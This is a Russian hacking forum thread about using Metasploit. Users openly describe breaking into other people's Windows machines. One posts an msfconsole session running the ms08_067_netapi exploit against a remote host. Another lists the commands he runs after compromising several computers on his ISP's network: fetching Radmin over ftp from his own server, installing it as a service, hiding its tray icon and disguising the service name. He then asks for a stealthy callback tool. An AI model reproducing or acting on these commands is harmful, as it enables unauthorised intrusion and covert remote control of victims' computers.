Авторские статьи Metasploit Framework для ламеров

Discussion in 'Статьи' started by -=lebed=-, 11 Jul 2006.

?
  1. Да, пользуюсь и доволен.

    51.2%
  2. Нет, он меня не устраивает, не нужен и т. п.

    14.8%
  3. А что это?

    34.0%
  1. Aza811

    Aza811 New Member

    Joined:
    26 Mar 2009
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Кто нибудь нашел решение кодировки в Windows (а то такая же хрень как в соседнем топике)не могу добавить usera в Администраторы.Зарание сенкс
     
  2. Brain explosion

    Joined:
    30 Jan 2009
    Messages:
    17
    Likes Received:
    6
    Reputations:
    0
    Была ссылка в этой теме на решение проблемы (см. посты выше).
     
  3. Likbez

    Likbez Elder - Старейшина

    Joined:
    13 Sep 2008
    Messages:
    10
    Likes Received:
    16
    Reputations:
    0
    Вот почитай, сразу все поймешь. К статье так же прилагаеться дополнение как настроить свой ftp server Serv-U. Все просто. >>> [ссыль]
     
  4. Aza811

    Aza811 New Member

    Joined:
    26 Mar 2009
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Все тот же вопрос по кодировке в консоле(насет остальных вопросов спасибо обьяснили)я конечно прочитал соседний топик, но внятного ответа на свой вопрос так и не нашел,может кто нибудь поможет мне разобраться?Да и еще ,а в линуксе так же дело обстоит с кракозяблами?
     
  5. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    2 Aza811
    Юзай meterpreter и будет тебе щастье! тапа и upload и dowload файлов! полезная штука
     
  6. Ratlub

    Ratlub New Member

    Joined:
    7 Jun 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Где находятся в мfs3 эксплоиты? В 2 версии нашел в третей не могу. Подскажите
     
  7. Amoura

    Amoura Elder - Старейшина

    Joined:
    23 Jan 2008
    Messages:
    237
    Likes Received:
    148
    Reputations:
    46

    в папке, где установлен Metasploit есть архив msf32.tar, открываешь его, msf32 -> modules -> exploits -> и дальше ищешь что нада.
     
  8. liquidcube

    liquidcube Member

    Joined:
    10 Apr 2009
    Messages:
    13
    Likes Received:
    10
    Reputations:
    0
    Для win все легко и просто и без разжевываний ясно.
    Я вот мучаюсь с его использованием на лине(fedora10),для него требутся Ruby(собрал,работает).
    Как metasploit через Ruby запустить?
     
  9. mozarat

    mozarat New Member

    Joined:
    10 Feb 2009
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    У меня последнее время возникла проблема. После команды exploit, все работает но только локально : 195.345.34.1/sfet . Но в строке url http://0.0.0.0/sfet
    Что может быть?
     
  10. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    нипанятна! 195.345.34.1 - это не ip адрес!
    давай полный лог консоли MSF!
     
  11. konst55

    konst55 New Member

    Joined:
    3 Jul 2009
    Messages:
    57
    Likes Received:
    1
    Reputations:
    0
    Приветсвую!
    Проблема такая использую метасплоит 3.2 из консоли на удаленном линуксовом серваке.

    msf > use windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > set PAYLOAD generic/shell_bind_tcp
    PAYLOAD => generic/shell_bind_tcp
    msf exploit(ms08_067_netapi) > set LHOST 4444
    LHOST => 4444
    msf exploit(ms08_067_netapi) > set RHOST *.*.*.*
    RHOST => *.*.*.*
    msf exploit(ms08_067_netapi) > exploit

    [*] Started bind handler
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 2 - lang:Russian
    [*] Selected Target: Windows XP SP2 Russian (NX)
    [-] Exploit failed: uninitialized constant Msf::ModuleSet::NDR
    [*] Exploit completed, but no session was created.

    И так постоянно. Что это за ошибка? Когда хакаю свою VMWare этого нет спокойно получаю консоль
     
  12. Blaskwolf

    Blaskwolf Guest

    Reputations:
    0
    Всем приятного время суток.
    Мона попросить вас накидать мне ссылок на видео или мануал по добавлению экплойтов в метасплойт 3.2 под виндой (хоть на английском..). Уже везде искал всё какие-та тупые мануалы и ничево дельново. Гугл заметных результатов тоже не дал..

    Заранее спс и респект всем
     
  13. Rashid

    Rashid Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    46
    Likes Received:
    4
    Reputations:
    2
    Я делаю так: сохраняю файл, к примеру, http://www.metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/ms09_002_memory_corruption.rb, в C:\Documents and Settings\Admin\Application Data\msf32\modules\exploits\windows\browser\ms09_002_memory_corruption.rb, перзапускаю и готово
     
  14. q2m

    q2m New Member

    Joined:
    8 Jun 2008
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    А что дальше?

    Здравствуйте, у меня есть пара вопросов, касающихся установки радмина на хост, который имеет динамический ip.

    1) Я ищу бажные компы с помощью сплоита SMB(ms08_067_netapi) в сети своего провайдера. Точнее я сначала ищу порт 445 с помощью angry ip scanner (находятся много хостов), а потом через консоль нахожу бажный хост. Найдя какой-нибудь бажный WinXP sp2, я получаю командную строку. И после этого хз что делать.

    Я делаю так
    Code:
    cmd> ftp ***.***.***.1
    cmd> user: I
    cmd> get r_server.exe
    cmd> get raddrv.dll
    cmd> AdmDll.dll
    cmd> bye
    cmd> r_server.exe /install /port:4899 /server
    cmd> REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
    cmd>CMD>REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f
    cmd>r_server.exe /start
    
    Потом через tasklist вижу свой процесс, но с помощью RViewer подключиться не могу. Пробовал останавливать сначала wscsvc, потом sharedaccess.

    Я уже на компах 5 так сделал, получается одно и тоже.
    --------------------------------------------------------------
    2)IP динамические, есть ли какая-нибудь прога, которая будет отстукиваться, допустим, мне на скрипт, лежащий на сервере? Смотрел в гугле, но толком ничего не нашел, ибо надо что-то скрытное и не нуждающееся в крипторах. Просто все те машины, которые я ломал позавчера, уже хз под каким ip, а я хочу их доделать )) :confused:

    3) Когда запускаю terminal.exe на сервере, что происходит? Открывается порт для удаленного рабочего стола и добавляется мультиюзерность в системе? Я просто запускаю этот файл, потом перезагружаю серв, и могу подключиться к нему через удаленный рабочий стол?
     
    #254 q2m, 14 Jul 2009
    Last edited: 14 Jul 2009
  15. hackmybrother

    hackmybrother New Member

    Joined:
    9 Aug 2009
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Подскажите пожалуйста, а как теперь реализовать атаку, только уже на чужую машину?
    В смысле, дать ip жертве и чтобы оно зашла.
    Это должен быть ip какого-то сайта?
     
  16. lemyrr

    lemyrr New Member

    Joined:
    29 Jun 2009
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Подскажите, есть ли эксплойты для висты. Искал и ни чего не нашел.
     
  17. Stradi

    Stradi Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    78
    Likes Received:
    31
    Reputations:
    5
    Тут такой вопрос назрел - как в шелл-строке поменять кодировку? Ибо в большинстве я атакую винды с русским интерфейсом, и навигация по русским папкам - проблема для меня, ибо карякули.
     
  18. five5feer

    five5feer Active Member

    Joined:
    8 Feb 2009
    Messages:
    164
    Likes Received:
    136
    Reputations:
    19
    chcp 1251
     
    3 people like this.
  19. raven314

    raven314 New Member

    Joined:
    30 Jan 2009
    Messages:
    44
    Likes Received:
    2
    Reputations:
    0
    прошу помощи.
    прочитал статьи, но наткнулся на некий трансендент.
    итак.
    посканил жертву xSpider нашел вот что
    445 / tcp "Microsoft DS"
    Серьезная уязвимость
    Удаленное выполнение команд (ms06-040)

    как использовать? >_<

    нашел вотета .

    откомпилил в *.exe
    что делать?)

    на компе стоит Metasploit Framework3.2
     
    #259 raven314, 21 Sep 2009
    Last edited: 21 Sep 2009
    1 person likes this.
  20. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Сплоиты в Metasploit Framework3.2 написаны на Ruby (это интерпретатор языка Ruby) тот сплоит что ты привёл написан на Си. Зачем всё валить в одну кучу? Либо юзай MSF либо компиль милвормовские сплоиты (тот что ты привёл - староват он) и юзай.
     
    1 person likes this.